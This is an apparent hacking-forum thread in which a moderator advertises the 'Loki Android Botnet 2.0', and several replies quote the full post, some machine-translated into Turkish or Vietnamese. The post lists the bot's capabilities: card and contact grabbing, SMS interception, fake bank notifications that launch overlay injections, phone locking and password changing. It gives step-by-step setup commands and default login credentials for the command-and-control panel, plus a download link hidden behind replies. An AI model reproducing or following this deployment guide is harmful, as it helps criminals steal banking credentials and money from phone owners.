0xploit.com

Loki Android Botnet Version 2.0 + Banking Injections

MalwareGod

Moderator
Staff member
Joined
Aug 15, 2023
Messages
83
Hellcoins
♆619
Bot features:

- Card grabber
- Install apk
- Spam on user contacts
- Call a number
- Forward incoming calls
- Launch user applications
- Automatic display of fake notifications, with bank icons taken
- Interception, block deletion of incoming SMS, sending, including to short numbers
- Download all user application names
- Contacts grabber
- Screen locker
- Launch pages in browser
- Launch user applications
- Search Application Bank
- Browser history grabber
- Socks5 module
- Spam based on numbers
- Sending USSD
- Killing a bot with disabling admin rights
- Geolocation

- Auto reply SMS

Admin panel:

Detailed statistics on countries, app, url history, sellers, etc.
The ability to issue commands to a specific bot, group, as well as to all newcomers.
Search by imei, sorting by installed applications, online bots, sellers, countries.
Cleaning up old logs.
Separate statistics for traffic.
Jabber notifications.
It is possible to upload your own injects from the admin panel.
Search by SMS, logs.
Search for links by history.
Statistics on tasks that are issued, completed.
Etc.

Additional info:
The size of the bot is 150 kb.
Stable work on Android 4-7.
Root rights are not required for the main work.
Admin rights request.
To change the phone password, admin rights are required (requested during installation).
Changing the password to Android Nougat (Android 7) partially.
Sending and intercepting SMS on all versions, deleting up to 4.4, downloading all SMS from 4.4, blocking SMS over 4.4 via SMS manager / Screen Locker (when blocking via SMS manager, only the holder does not see SMS).
Constant display of bank (fake) notifications with bank icons, the text can be set from the admin panel, when you click on the message, an injection is launched.
Injections of euro countries are available, they are included with the bot.

Usage & Build Method:
Loki admin panel installs instructions:


apt-get update && apt-get upgrade -y
apt-get install apache2 libapache2-mod-php5 mysql-server php5 php5-mysql -y
apt-get install default-jre default-jdk -y

Debian 7:
apt-get install ia32-libs lib32z1 lib32ncurses5 -y

Debian 8:

dpkg --add-architecture i386
apt-get update
apt-get install libstdc++6:i386 libgcc1:i386 zlib1g:i386 libncurses5:i386 lib32z1 lib32ncurses5


Next:

wget https:// raw.githubusercontent.com/iBotPeach...apktool
wget -O apktool.jar https://bitbucket.org/iBotPeaches/apktool/d....4.jar
chmod +x ~/apktool.jar
chmod +x ~/apktool
mv ~/apktool.jar /usr/local/bin/
mv ~/apktool /usr/local/bin/


Next:


extract loki.tar to a new directory. something like this: tar xf loki.tar -C /var/www/
change file owner: chown -R www-data: www-data /var/www/

Run: mysql

create loki database;
grant all privileges on loki.* on loki@localhost specified 'DB_PASSWORD'; grant all privileges on loki.* 'DB_PASSWORD' is defined on loki@localhost;
go out.

file loki4dev.sql BD import:

mysql loki < /var/www/site/ loki 4dev.sql mysql pbolonka1 < /var/www/site/loki4dev.sql root - loki

Edit: /var/www/site/db.php and enter mysql database access:


db: loki
db user: loki
db password: DB_PASSWORD


Done!
Administration panel of the address http://domain/site/ or http://ip_server/site/

login with the name bot4fun and password J1HPbmr



Download Link Of Loki Android Botnet:

You must reply before you can see the hidden data contained here.
 

Nibbz.MW

New member
Joined
Aug 31, 2023
Messages
6
Hellcoins
♆11
Bot features:

- Card grabber
- Install apk
- Spam on user contacts
- Call a number
- Forward incoming calls
- Launch user applications
- Automatic display of fake notifications, with bank icons taken
- Interception, block deletion of incoming SMS, sending, including to short numbers
- Download all user application names
- Contacts grabber
- Screen locker
- Launch pages in browser
- Launch user applications
- Search Application Bank
- Browser history grabber
- Socks5 module
- Spam based on numbers
- Sending USSD
- Killing a bot with disabling admin rights
- Geolocation

- Auto reply SMS

Admin panel:

Detailed statistics on countries, app, url history, sellers, etc.
The ability to issue commands to a specific bot, group, as well as to all newcomers.
Search by imei, sorting by installed applications, online bots, sellers, countries.
Cleaning up old logs.
Separate statistics for traffic.
Jabber notifications.
It is possible to upload your own injects from the admin panel.
Search by SMS, logs.
Search for links by history.
Statistics on tasks that are issued, completed.
Etc.

Additional info:
The size of the bot is 150 kb.
Stable work on Android 4-7.
Root rights are not required for the main work.
Admin rights request.
To change the phone password, admin rights are required (requested during installation).
Changing the password to Android Nougat (Android 7) partially.
Sending and intercepting SMS on all versions, deleting up to 4.4, downloading all SMS from 4.4, blocking SMS over 4.4 via SMS manager / Screen Locker (when blocking via SMS manager, only the holder does not see SMS).
Constant display of bank (fake) notifications with bank icons, the text can be set from the admin panel, when you click on the message, an injection is launched.
Injections of euro countries are available, they are included with the bot.

Usage & Build Method:
Loki admin panel installs instructions:


apt-get update && apt-get upgrade -y
apt-get install apache2 libapache2-mod-php5 mysql-server php5 php5-mysql -y
apt-get install default-jre default-jdk -y

Debian 7:
apt-get install ia32-libs lib32z1 lib32ncurses5 -y

Debian 8:

dpkg --add-architecture i386
apt-get update
apt-get install libstdc++6:i386 libgcc1:i386 zlib1g:i386 libncurses5:i386 lib32z1 lib32ncurses5


Next:

wget https:// raw.githubusercontent.com/iBotPeach...apktool
wget -O apktool.jar https://bitbucket.org/iBotPeaches/apktool/d....4.jar
chmod +x ~/apktool.jar
chmod +x ~/apktool
mv ~/apktool.jar /usr/local/bin/
mv ~/apktool /usr/local/bin/


Next:


extract loki.tar to a new directory. something like this: tar xf loki.tar -C /var/www/
change file owner: chown -R www-data: www-data /var/www/

Run: mysql

create loki database;
grant all privileges on loki.* on loki@localhost specified 'DB_PASSWORD'; grant all privileges on loki.* 'DB_PASSWORD' is defined on loki@localhost;
go out.

file loki4dev.sql BD import:

mysql loki < /var/www/site/ loki 4dev.sql mysql pbolonka1 < /var/www/site/loki4dev.sql root - loki

Edit: /var/www/site/db.php and enter mysql database access:


db: loki
db user: loki
db password: DB_PASSWORD


Done!
Administration panel of the address http://domain/site/ or http://ip_server/site/

login with the name bot4fun and password J1HPbmr

Download Link Of Loki Android Botnet:
[Hidden content]
thx
 
Joined
Jul 25, 2023
Messages
45
Hellcoins
♆84
Bot features:

- Card grabber
- Install apk
- Spam on user contacts
- Call a number
- Forward incoming calls
- Launch user applications
- Automatic display of fake notifications, with bank icons taken
- Interception, block deletion of incoming SMS, sending, including to short numbers
- Download all user application names
- Contacts grabber
- Screen locker
- Launch pages in browser
- Launch user applications
- Search Application Bank
- Browser history grabber
- Socks5 module
- Spam based on numbers
- Sending USSD
- Killing a bot with disabling admin rights
- Geolocation

- Auto reply SMS

Admin panel:

Detailed statistics on countries, app, url history, sellers, etc.
The ability to issue commands to a specific bot, group, as well as to all newcomers.
Search by imei, sorting by installed applications, online bots, sellers, countries.
Cleaning up old logs.
Separate statistics for traffic.
Jabber notifications.
It is possible to upload your own injects from the admin panel.
Search by SMS, logs.
Search for links by history.
Statistics on tasks that are issued, completed.
Etc.

Additional info:
The size of the bot is 150 kb.
Stable work on Android 4-7.
Root rights are not required for the main work.
Admin rights request.
To change the phone password, admin rights are required (requested during installation).
Changing the password to Android Nougat (Android 7) partially.
Sending and intercepting SMS on all versions, deleting up to 4.4, downloading all SMS from 4.4, blocking SMS over 4.4 via SMS manager / Screen Locker (when blocking via SMS manager, only the holder does not see SMS).
Constant display of bank (fake) notifications with bank icons, the text can be set from the admin panel, when you click on the message, an injection is launched.
Injections of euro countries are available, they are included with the bot.

Usage & Build Method:
Loki admin panel installs instructions:


apt-get update && apt-get upgrade -y
apt-get install apache2 libapache2-mod-php5 mysql-server php5 php5-mysql -y
apt-get install default-jre default-jdk -y

Debian 7:
apt-get install ia32-libs lib32z1 lib32ncurses5 -y

Debian 8:

dpkg --add-architecture i386
apt-get update
apt-get install libstdc++6:i386 libgcc1:i386 zlib1g:i386 libncurses5:i386 lib32z1 lib32ncurses5


Next:

wget https:// raw.githubusercontent.com/iBotPeach...apktool
wget -O apktool.jar https://bitbucket.org/iBotPeaches/apktool/d....4.jar
chmod +x ~/apktool.jar
chmod +x ~/apktool
mv ~/apktool.jar /usr/local/bin/
mv ~/apktool /usr/local/bin/


Next:


extract loki.tar to a new directory. something like this: tar xf loki.tar -C /var/www/
change file owner: chown -R www-data: www-data /var/www/

Run: mysql

create loki database;
grant all privileges on loki.* on loki@localhost specified 'DB_PASSWORD'; grant all privileges on loki.* 'DB_PASSWORD' is defined on loki@localhost;
go out.

file loki4dev.sql BD import:

mysql loki < /var/www/site/ loki 4dev.sql mysql pbolonka1 < /var/www/site/loki4dev.sql root - loki

Edit: /var/www/site/db.php and enter mysql database access:


db: loki
db user: loki
db password: DB_PASSWORD


Done!
Administration panel of the address http://domain/site/ or http://ip_server/site/

login with the name bot4fun and password J1HPbmr

Download Link Of Loki Android Botnet:
[Hidden content]
lets see
 
Joined
Sep 10, 2023
Messages
33
Hellcoins
♆42
Bot features:

- Card grabber
- Install apk
- Spam on user contacts
- Call a number
- Forward incoming calls
- Launch user applications
- Automatic display of fake notifications, with bank icons taken
- Interception, block deletion of incoming SMS, sending, including to short numbers
- Download all user application names
- Contacts grabber
- Screen locker
- Launch pages in browser
- Launch user applications
- Search Application Bank
- Browser history grabber
- Socks5 module
- Spam based on numbers
- Sending USSD
- Killing a bot with disabling admin rights
- Geolocation

- Auto reply SMS

Admin panel:

Detailed statistics on countries, app, url history, sellers, etc.
The ability to issue commands to a specific bot, group, as well as to all newcomers.
Search by imei, sorting by installed applications, online bots, sellers, countries.
Cleaning up old logs.
Separate statistics for traffic.
Jabber notifications.
It is possible to upload your own injects from the admin panel.
Search by SMS, logs.
Search for links by history.
Statistics on tasks that are issued, completed.
Etc.

Additional info:
The size of the bot is 150 kb.
Stable work on Android 4-7.
Root rights are not required for the main work.
Admin rights request.
To change the phone password, admin rights are required (requested during installation).
Changing the password to Android Nougat (Android 7) partially.
Sending and intercepting SMS on all versions, deleting up to 4.4, downloading all SMS from 4.4, blocking SMS over 4.4 via SMS manager / Screen Locker (when blocking via SMS manager, only the holder does not see SMS).
Constant display of bank (fake) notifications with bank icons, the text can be set from the admin panel, when you click on the message, an injection is launched.
Injections of euro countries are available, they are included with the bot.

Usage & Build Method:
Loki admin panel installs instructions:


apt-get update && apt-get upgrade -y
apt-get install apache2 libapache2-mod-php5 mysql-server php5 php5-mysql -y
apt-get install default-jre default-jdk -y

Debian 7:
apt-get install ia32-libs lib32z1 lib32ncurses5 -y

Debian 8:

dpkg --add-architecture i386
apt-get update
apt-get install libstdc++6:i386 libgcc1:i386 zlib1g:i386 libncurses5:i386 lib32z1 lib32ncurses5


Next:

wget https:// raw.githubusercontent.com/iBotPeach...apktool
wget -O apktool.jar https://bitbucket.org/iBotPeaches/apktool/d....4.jar
chmod +x ~/apktool.jar
chmod +x ~/apktool
mv ~/apktool.jar /usr/local/bin/
mv ~/apktool /usr/local/bin/


Sonraki:


loki.tar'ı yeni bir dizine çıkartın. şunun gibi bir şey: tar xf loki.tar -C /var/www/
dosya sahibini değiştir: chown -R www-data: www-data /var/www/

Çalıştır: mysql

loki veritabanı oluştur;
'DB_PASSWORD' belirtilen loki@localhost'ta loki.* üzerinde tüm ayrıcalıkları verin; loki'de tüm ayrıcalıkları verin.* 'DB_PASSWORD' loki@localhost'ta tanımlıdır;
dışarı çıkmak.

loki4dev.sql BD içe aktarma dosyası:

mysql loki < /var/www/site/ loki 4dev.sql mysql pbolonka1 < /var/www/site/loki4dev.sql kökü - loki

Düzenleme: /var/www/site/db.php ve mysql veritabanı erişimini girin:


db: loki
db kullanıcısı: loki
db şifresi: DB_PASSWORD


Tamamlamak!
http://domain/site/ veya http://ip_server/site/ adresinin yönetim paneli

bot4fun adı ve J1HPbmr şifresiyle giriş yapın

[/BİR ŞEYİN ÖNCEDEN REKLAMI]

Loki Android Botnet'in İndirme Bağlantısı:
[Gizli İçerik]
Aasfsadsaadasd
 

xalafsb

New member
Joined
Sep 11, 2023
Messages
1
Hellcoins
♆3
Bot features:

- Card grabber
- Install apk
- Spam on user contacts
- Call a number
- Forward incoming calls
- Launch user applications
- Automatic display of fake notifications, with bank icons taken
- Interception, block deletion of incoming SMS, sending, including to short numbers
- Download all user application names
- Contacts grabber
- Screen locker
- Launch pages in browser
- Launch user applications
- Search Application Bank
- Browser history grabber
- Socks5 module
- Spam based on numbers
- Sending USSD
- Killing a bot with disabling admin rights
- Geolocation

- Auto reply SMS

Admin panel:

Detailed statistics on countries, app, url history, sellers, etc.
The ability to issue commands to a specific bot, group, as well as to all newcomers.
Search by imei, sorting by installed applications, online bots, sellers, countries.
Cleaning up old logs.
Separate statistics for traffic.
Jabber notifications.
It is possible to upload your own injects from the admin panel.
Search by SMS, logs.
Search for links by history.
Statistics on tasks that are issued, completed.
Etc.

Additional info:
The size of the bot is 150 kb.
Stable work on Android 4-7.
Root rights are not required for the main work.
Admin rights request.
To change the phone password, admin rights are required (requested during installation).
Changing the password to Android Nougat (Android 7) partially.
Sending and intercepting SMS on all versions, deleting up to 4.4, downloading all SMS from 4.4, blocking SMS over 4.4 via SMS manager / Screen Locker (when blocking via SMS manager, only the holder does not see SMS).
Constant display of bank (fake) notifications with bank icons, the text can be set from the admin panel, when you click on the message, an injection is launched.
Injections of euro countries are available, they are included with the bot.

Usage & Build Method:
Loki admin panel installs instructions:


apt-get update && apt-get upgrade -y
apt-get install apache2 libapache2-mod-php5 mysql-server php5 php5-mysql -y
apt-get install default-jre default-jdk -y

Debian 7:
apt-get install ia32-libs lib32z1 lib32ncurses5 -y

Debian 8:

dpkg --add-architecture i386
apt-get update
apt-get install libstdc++6:i386 libgcc1:i386 zlib1g:i386 libncurses5:i386 lib32z1 lib32ncurses5


Next:

wget https:// raw.githubusercontent.com/iBotPeach...apktool
wget -O apktool.jar https://bitbucket.org/iBotPeaches/apktool/d....4.jar
chmod +x ~/apktool.jar
chmod +x ~/apktool
mv ~/apktool.jar /usr/local/bin/
mv ~/apktool /usr/local/bin/


Next:


extract loki.tar to a new directory. something like this: tar xf loki.tar -C /var/www/
change file owner: chown -R www-data: www-data /var/www/

Run: mysql

create loki database;
grant all privileges on loki.* on loki@localhost specified 'DB_PASSWORD'; grant all privileges on loki.* 'DB_PASSWORD' is defined on loki@localhost;
go out.

file loki4dev.sql BD import:

mysql loki < /var/www/site/ loki 4dev.sql mysql pbolonka1 < /var/www/site/loki4dev.sql root - loki

Edit: /var/www/site/db.php and enter mysql database access:


db: loki
db user: loki
db password: DB_PASSWORD


Done!
Administration panel of the address http://domain/site/ or http://ip_server/site/

login with the name bot4fun and password J1HPbmr

Download Link Of Loki Android Botnet:
[Hidden content]
 
Joined
Aug 8, 2023
Messages
82
Hellcoins
♆109
Bot features:

- Card grabber
- Install apk
- Spam on user contacts
- Call a number
- Forward incoming calls
- Launch user applications
- Automatic display of fake notifications, with bank icons taken
- Interception, block deletion of incoming SMS, sending, including to short numbers
- Download all user application names
- Contacts grabber
- Screen locker
- Launch pages in browser
- Launch user applications
- Search Application Bank
- Browser history grabber
- Socks5 module
- Spam based on numbers
- Sending USSD
- Killing a bot with disabling admin rights
- Geolocation

- Auto reply SMS

Admin panel:

Detailed statistics on countries, app, url history, sellers, etc.
The ability to issue commands to a specific bot, group, as well as to all newcomers.
Search by imei, sorting by installed applications, online bots, sellers, countries.
Cleaning up old logs.
Separate statistics for traffic.
Jabber notifications.
It is possible to upload your own injects from the admin panel.
Search by SMS, logs.
Search for links by history.
Statistics on tasks that are issued, completed.
Etc.

Additional info:
The size of the bot is 150 kb.
Stable work on Android 4-7.
Root rights are not required for the main work.
Admin rights request.
To change the phone password, admin rights are required (requested during installation).
Changing the password to Android Nougat (Android 7) partially.
Sending and intercepting SMS on all versions, deleting up to 4.4, downloading all SMS from 4.4, blocking SMS over 4.4 via SMS manager / Screen Locker (when blocking via SMS manager, only the holder does not see SMS).
Constant display of bank (fake) notifications with bank icons, the text can be set from the admin panel, when you click on the message, an injection is launched.
Injections of euro countries are available, they are included with the bot.

Usage & Build Method:
Loki admin panel installs instructions:


apt-get update && apt-get upgrade -y
apt-get install apache2 libapache2-mod-php5 mysql-server php5 php5-mysql -y
apt-get install default-jre default-jdk -y

Debian 7:
apt-get install ia32-libs lib32z1 lib32ncurses5 -y

Debian 8:

dpkg --add-architecture i386
apt-get update
apt-get install libstdc++6:i386 libgcc1:i386 zlib1g:i386 libncurses5:i386 lib32z1 lib32ncurses5


Next:

wget https:// raw.githubusercontent.com/iBotPeach...apktool
wget -O apktool.jar https://bitbucket.org/iBotPeaches/apktool/d....4.jar
chmod +x ~/apktool.jar
chmod +x ~/apktool
mv ~/apktool.jar /usr/local/bin/
mv ~/apktool /usr/local/bin/


Next:


extract loki.tar to a new directory. something like this: tar xf loki.tar -C /var/www/
change file owner: chown -R www-data: www-data /var/www/

Run: mysql

create loki database;
grant all privileges on loki.* on loki@localhost specified 'DB_PASSWORD'; grant all privileges on loki.* 'DB_PASSWORD' is defined on loki@localhost;
go out.

file loki4dev.sql BD import:

mysql loki < /var/www/site/ loki 4dev.sql mysql pbolonka1 < /var/www/site/loki4dev.sql root - loki

Edit: /var/www/site/db.php and enter mysql database access:


db: loki
db user: loki
db password: DB_PASSWORD


Done!
Administration panel of the address http://domain/site/ or http://ip_server/site/

login with the name bot4fun and password J1HPbmr

Download Link Of Loki Android Botnet:
[Hidden content]
crazy!!
 
Joined
Oct 8, 2022
Messages
113
Location
Berlin.123BhB
Hellcoins
♆433
Bot features:

- Card grabber
- Install apk
- Spam on user contacts
- Call a number
- Forward incoming calls
- Launch user applications
- Automatic display of fake notifications, with bank icons taken
- Interception, block deletion of incoming SMS, sending, including to short numbers
- Download all user application names
- Contacts grabber
- Screen locker
- Launch pages in browser
- Launch user applications
- Search Application Bank
- Browser history grabber
- Socks5 module
- Spam based on numbers
- Sending USSD
- Killing a bot with disabling admin rights
- Geolocation

- Auto reply SMS

Admin panel:

Detailed statistics on countries, app, url history, sellers, etc.
The ability to issue commands to a specific bot, group, as well as to all newcomers.
Search by imei, sorting by installed applications, online bots, sellers, countries.
Cleaning up old logs.
Separate statistics for traffic.
Jabber notifications.
It is possible to upload your own injects from the admin panel.
Search by SMS, logs.
Search for links by history.
Statistics on tasks that are issued, completed.
Etc.

Additional info:
The size of the bot is 150 kb.
Stable work on Android 4-7.
Root rights are not required for the main work.
Admin rights request.
To change the phone password, admin rights are required (requested during installation).
Changing the password to Android Nougat (Android 7) partially.
Sending and intercepting SMS on all versions, deleting up to 4.4, downloading all SMS from 4.4, blocking SMS over 4.4 via SMS manager / Screen Locker (when blocking via SMS manager, only the holder does not see SMS).
Constant display of bank (fake) notifications with bank icons, the text can be set from the admin panel, when you click on the message, an injection is launched.
Injections of euro countries are available, they are included with the bot.

Usage & Build Method:
Loki admin panel installs instructions:


apt-get update && apt-get upgrade -y
apt-get install apache2 libapache2-mod-php5 mysql-server php5 php5-mysql -y
apt-get install default-jre default-jdk -y

Debian 7:
apt-get install ia32-libs lib32z1 lib32ncurses5 -y

Debian 8:

dpkg --add-architecture i386
apt-get update
apt-get install libstdc++6:i386 libgcc1:i386 zlib1g:i386 libncurses5:i386 lib32z1 lib32ncurses5


Next:

wget https:// raw.githubusercontent.com/iBotPeach...apktool
wget -O apktool.jar https://bitbucket.org/iBotPeaches/apktool/d....4.jar
chmod +x ~/apktool.jar
chmod +x ~/apktool
mv ~/apktool.jar /usr/local/bin/
mv ~/apktool /usr/local/bin/


Next:


extract loki.tar to a new directory. something like this: tar xf loki.tar -C /var/www/
change file owner: chown -R www-data: www-data /var/www/

Run: mysql

create loki database;
grant all privileges on loki.* on loki@localhost specified 'DB_PASSWORD'; grant all privileges on loki.* 'DB_PASSWORD' is defined on loki@localhost;
go out.

file loki4dev.sql BD import:

mysql loki < /var/www/site/ loki 4dev.sql mysql pbolonka1 < /var/www/site/loki4dev.sql root - loki

Edit: /var/www/site/db.php and enter mysql database access:


db: loki
db user: loki
db password: DB_PASSWORD


Done!
Administration panel of the address http://domain/site/ or http://ip_server/site/

login with the name bot4fun and password J1HPbmr

Download Link Of Loki Android Botnet:
[Hidden content]
Gg
 

bighitran

New member
Joined
Oct 13, 2023
Messages
20
Hellcoins
♆32
Tính năng của bot:

- Dụng cụ lấy thẻ
- Cài đặt apk
- Spam trên danh bạ người dùng
- Gọi một số
- Chuyển tiếp cuộc gọi đến
- Khởi chạy ứng dụng người dùng
- Tự động hiển thị thông báo giả mạo, có lấy biểu tượng ngân hàng
- Chặn, chặn xóa tin nhắn SMS đến, gửi, kể cả gửi tới số ngắn
- Tải xuống tất cả tên ứng dụng của người dùng
- Công cụ lấy danh bạ
- Khóa màn hình
- Khởi chạy các trang trong trình duyệt
- Khởi chạy ứng dụng người dùng
- Ngân hàng ứng dụng tìm kiếm
- Trình lấy lịch sử trình duyệt
- Mô-đun Vớ5
- Thư rác dựa trên số
- Gửi USSD
- Giết bot bằng cách vô hiệu hóa quyền quản trị viên
- Định vị địa lý

- Tự động trả lời SMS

Bảng quản trị:

Thống kê chi tiết về quốc gia, ứng dụng, lịch sử url, người bán, v.v.
Khả năng ra lệnh cho một bot, nhóm cụ thể cũng như cho tất cả người mới.
Tìm kiếm theo imei, sắp xếp theo ứng dụng đã cài đặt, bot trực tuyến, người bán, quốc gia.
Dọn dẹp các bản ghi cũ.
Thống kê riêng cho lưu lượng truy cập.
Thông báo của Jabber.
Có thể tải lên nội dung tiêm của riêng bạn từ bảng quản trị.
Tìm kiếm bằng SMS, nhật ký.
Tìm kiếm liên kết theo lịch sử.
Thống kê các nhiệm vụ đã ban hành, hoàn thành.
Vân vân.

Thông tin bổ sung:
Kích thước của bot là 150 kb.
Hoạt động ổn định trên Android 4-7.
Quyền root không cần thiết cho công việc chính.
Yêu cầu quyền quản trị.
Để đổi mật khẩu điện thoại cần có quyền quản trị viên (yêu cầu trong quá trình cài đặt).
Thay đổi một phần mật khẩu sang Android Nougat (Android 7).
Gửi và chặn SMS trên mọi phiên bản, xóa tới 4.4, tải toàn bộ SMS từ 4.4, chặn SMS trên 4.4 qua trình quản lý SMS/Screen Locker (khi chặn qua trình quản lý SMS, chỉ có chủ sở hữu không thấy SMS).
Hiển thị liên tục các thông báo ngân hàng (giả mạo) với các biểu tượng ngân hàng, văn bản có thể được đặt từ bảng quản trị, khi bạn nhấp vào tin nhắn, một mũi tiêm sẽ được khởi chạy.
Việc tiêm các quốc gia đồng euro có sẵn, chúng được bao gồm trong bot.

Phương pháp sử dụng & xây dựng:
Hướng dẫn cài đặt bảng quản trị Loki:


cập nhật apt-get && nâng cấp apt-get -y
apt-get cài đặt apache2 libapache2-mod-php5 mysql-server php5 php5-mysql -y
apt-get cài đặt default-jre default-jdk -y

Debian 7:
apt-get cài đặt ia32-libs lib32z1 lib32ncurses5 -y

Debian 8:

dpkg --add-architecture i386
cập nhật apt-get
apt-get cài đặt libstdc++6:i386 libgcc1:i386 zlib1g:i386 libncurses5:i386 lib32z1 lib32ncurses5


Kế tiếp:

wget https:// raw.githubusercontent.com/iBotPeach...apktool
wget -O apktool.jar https://bitbucket.org/iBotPeaches/apktool/d....4.jar
chmod +x ~/apktool.jar
chmod +x ~/apktool
mv ~/apktool.jar /usr/local/bin/
mv ~/apktool /usr/local/bin/


Kế tiếp:


giải nén loki.tar vào một thư mục mới. đại loại như thế này: tar xf loki.tar -C /var/www/
thay đổi chủ sở hữu tập tin: chown -R www-data: www-data /var/www/

Chạy: mysql

tạo cơ sở dữ liệu loki;
cấp tất cả các đặc quyền trên loki.* trên loki@localhost được chỉ định 'DB_PASSWORD'; cấp tất cả các đặc quyền trên loki.* 'DB_PASSWORD' được xác định trên loki@localhost;
đi ra ngoài.

nhập tệp loki4dev.sql BD:

mysql loki </ /var/www/site/ loki 4dev.sql mysql pbolonka1 </ /var/www/site/loki4dev.sql root - loki

Chỉnh sửa: /var/www/site/db.php và nhập quyền truy cập cơ sở dữ liệu mysql:


db: loki
người dùng db: loki
mật khẩu db: DB_PASSWORD


Xong!
Bảng quản trị địa chỉ http://domain/site/ hoặc http://ip_server/site/

đăng nhập với tên bot4fun và mật khẩu J1HPbmr

Link tải Botnet Android của Loki:
[Nội dung ẩn]
11
 
Top